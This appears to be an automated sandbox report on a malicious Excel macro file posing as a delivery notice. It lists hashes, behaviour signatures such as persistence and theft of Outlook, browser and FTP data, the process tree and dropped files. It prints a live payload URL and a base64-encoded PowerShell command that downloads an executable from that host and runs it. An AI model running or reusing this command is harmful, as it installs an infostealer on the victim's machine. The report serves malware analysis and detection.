Analysis
-
max time kernel
123s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21-10-2021 05:55
Static task
static1
Behavioral task
behavioral1
Sample
delivery noticefNQSE5.xlsm
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
delivery noticefNQSE5.xlsm
Resource
win10-en-20211014
General
-
Target
delivery noticefNQSE5.xlsm
-
Size
389KB
-
MD5
cf4c3f1e0953167d484fb25ac961db42
-
SHA1
d946a7e52728e50d6013a65bc0eb008b42b83787
-
SHA256
81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b
-
SHA512
d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e
Malware Config
Extracted
http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2396 2500 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 3796 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Qxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exepid process 1916 Qxwhhwxztatczrimdt.exe 700 Qxwhhwxztatczrimdt.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 2500 EXCEL.EXE -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Qxwhhwxztatczrimdt.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Qxwhhwxztatczrimdt.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Qxwhhwxztatczrimdt.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Qxwhhwxztatczrimdt.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Qxwhhwxztatczrimdt.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\note = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\office\\note.exe\"" Qxwhhwxztatczrimdt.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 42 checkip.dyndns.org 45 freegeoip.app 46 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Qxwhhwxztatczrimdt.exedescription pid process target process PID 1916 set thread context of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\B5467F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2500 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exepid process 3796 powershell.exe 3796 powershell.exe 3796 powershell.exe 1916 Qxwhhwxztatczrimdt.exe 1916 Qxwhhwxztatczrimdt.exe 700 Qxwhhwxztatczrimdt.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 2500 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exedescription pid process Token: SeDebugPrivilege 3796 powershell.exe Token: SeDebugPrivilege 1916 Qxwhhwxztatczrimdt.exe Token: SeDebugPrivilege 700 Qxwhhwxztatczrimdt.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE 2500 EXCEL.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeQxwhhwxztatczrimdt.exedescription pid process target process PID 2500 wrote to memory of 2396 2500 EXCEL.EXE cmd.exe PID 2500 wrote to memory of 2396 2500 EXCEL.EXE cmd.exe PID 2396 wrote to memory of 3796 2396 cmd.exe powershell.exe PID 2396 wrote to memory of 3796 2396 cmd.exe powershell.exe PID 3796 wrote to memory of 1916 3796 powershell.exe Qxwhhwxztatczrimdt.exe PID 3796 wrote to memory of 1916 3796 powershell.exe Qxwhhwxztatczrimdt.exe PID 3796 wrote to memory of 1916 3796 powershell.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe PID 1916 wrote to memory of 700 1916 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe -
outlook_office_path 1 IoCs
Processes:
Qxwhhwxztatczrimdt.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Qxwhhwxztatczrimdt.exe -
outlook_win_path 1 IoCs
Processes:
Qxwhhwxztatczrimdt.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Qxwhhwxztatczrimdt.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Qtkkhrqfym.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBRAHgAdwBoAGgAdwB4AHoAdABhAHQAYwB6AHIAaQBtAGQAdAAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADMALgA2ADQALgAyADUAMQAuADEAMwA5AC8AdgByAC8AcgAvAFEAQQA0AHQAeQAyAHUAVQBrAFQAQwBEADIAdABmAE4AUQBTAEUANQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exeC:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qxwhhwxztatczrimdt.exe.logMD5
605f809fab8c19729d39d075f7ffdb53
SHA1c546f877c9bd53563174a90312a8337fdfc5fdd9
SHA2566904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556
SHA51282cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3
-
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exeMD5
1eada844f6d267f4451b9ffa8eba6624
SHA111144faece06eb2b3c9c7e19ac3c170b66a351f7
SHA25649e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
SHA5121ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726
-
C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exeMD5
1eada844f6d267f4451b9ffa8eba6624
SHA111144faece06eb2b3c9c7e19ac3c170b66a351f7
SHA25649e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
SHA5121ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726
-
C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exeMD5
1eada844f6d267f4451b9ffa8eba6624
SHA111144faece06eb2b3c9c7e19ac3c170b66a351f7
SHA25649e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
SHA5121ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726
-
C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exeMD5
1eada844f6d267f4451b9ffa8eba6624
SHA111144faece06eb2b3c9c7e19ac3c170b66a351f7
SHA25649e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
SHA5121ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726
-
C:\Users\Admin\Documents\Qtkkhrqfym.batMD5
57cc9b0d215088ba8b5d63024605da81
SHA1cdc02772f2d7ecacbb86ad63e67b1726b36eafc6
SHA256ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70
SHA512bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3
-
memory/700-339-0x0000000004F10000-0x0000000004F11000-memory.dmpFilesize
4KB
-
memory/700-331-0x00000000004203FE-mapping.dmp
-
memory/1916-328-0x0000000005260000-0x0000000005261000-memory.dmpFilesize
4KB
-
memory/1916-321-0x0000000000000000-mapping.dmp
-
memory/2396-291-0x0000000000000000-mapping.dmp
-
memory/2500-120-0x000001E07E690000-0x000001E07E692000-memory.dmpFilesize
8KB
-
memory/2500-119-0x00007FFA59100000-0x00007FFA59110000-memory.dmpFilesize
64KB
-
memory/2500-116-0x00007FFA59100000-0x00007FFA59110000-memory.dmpFilesize
64KB
-
memory/2500-117-0x00007FFA59100000-0x00007FFA59110000-memory.dmpFilesize
64KB
-
memory/2500-118-0x00007FFA59100000-0x00007FFA59110000-memory.dmpFilesize
64KB
-
memory/2500-129-0x00007FFA55590000-0x00007FFA555A0000-memory.dmpFilesize
64KB
-
memory/2500-128-0x00007FFA55590000-0x00007FFA555A0000-memory.dmpFilesize
64KB
-
memory/2500-122-0x000001E07E690000-0x000001E07E692000-memory.dmpFilesize
8KB
-
memory/2500-115-0x00007FFA59100000-0x00007FFA59110000-memory.dmpFilesize
64KB
-
memory/2500-121-0x000001E07E690000-0x000001E07E692000-memory.dmpFilesize
8KB
-
memory/3796-293-0x0000000000000000-mapping.dmp
-
memory/3796-316-0x000001EAEC726000-0x000001EAEC728000-memory.dmpFilesize
8KB
-
memory/3796-304-0x000001EAEC723000-0x000001EAEC725000-memory.dmpFilesize
8KB
-
memory/3796-303-0x000001EAEC720000-0x000001EAEC722000-memory.dmpFilesize
8KB